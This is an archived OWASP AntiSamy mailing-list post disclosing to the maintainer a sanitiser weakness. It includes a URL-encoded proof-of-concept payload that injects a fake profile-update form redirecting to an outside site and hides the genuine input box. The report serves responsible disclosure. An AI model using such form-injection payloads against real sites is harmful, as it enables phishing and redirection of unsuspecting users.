[Owasp-antisamy] Inserting forms to redirect to malicious locations

Michael Coates mwcoates at gmail.com
Fri Apr 18 13:49:37 EDT 2008


Arshan,

I found an area of antisamy that can be exploited.  It looks like the
trouble is that I can insert non malicious html tags that interact with the
page itself.  So, while I can't get malicious javascript in to your page, I
can create a nice looking form that redirects to somewhere that does have
malicious code.

Here is the link (its safe):
http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=Please+update+me.+No+really%2C+put+something+in+and+hit+update.%0D%0A%3Ctable%3E%0D%0A%3Ctr%3E%3Ctd%3E%0D%0A%3Ctextarea+rows%3D%223%22+cols%3D%2240%22+name%3D%22profile%22%3E+%3C%2Ftextarea%3E%0D%0A%3C%2Ftd%3E%0D%0A%3Ctd+valign%3D%22top%22%3E%0D%0A%09%3Cform+id%3D%22michaelForm%22+method%3D%22GET%22+action%3D%22http%3A%2F%2Fgoogle.com%2Fsearch%22%3E%0D%0A%09%09%3Cselect+name%3D%22policy%22%3E%0D%0A%09%09%09%3Coption%3Eantisamy-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-slashdot-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-ebay-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-myspace-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%3C%2Fselect%3E%0D%0A%09%09%3Cinput+type%3D%22hidden%22+name%3D%22q%22+value%3D%22Hi+Arhsan%21%21+Where+should+we+redirect+today%3F%22+%2F%3E%0D%0A%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22Update+Profile%22%3E%0D%0A%3C%2Ftd%3E%0D%0A%0D%0A%09%3C%2Fform%3E%0D%0A%3C%2Ftable%3E%0D%0A%0D%0A%3Chr%3E%0D%0A%3Ctable+border%3D%220%22+cellpadding%3D%221000%22%3E%0D%0A%3Ctr%3E%3Ctd%3E%3C%2Ftd%3E%3C%2Ftr%3E%0D%0A%0D%0A%3C%2Ftable%3E%0D%0AI+couldn%27t+delete+the+actual+input+box%2C+so+I+just+hid+it+a+bit.+%3A%29&policy=antisamy-1.1.1.xml

Hey, looks like Google knows how to spell your name :)

Thanks,
Michael

-- 
Michael Coates
email: mwcoates at gmail.com

http://michaelcoates.wordpress.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-antisamy/attachments/20080418/3c66fb08/attachment.html 


More information about the Owasp-antisamy mailing list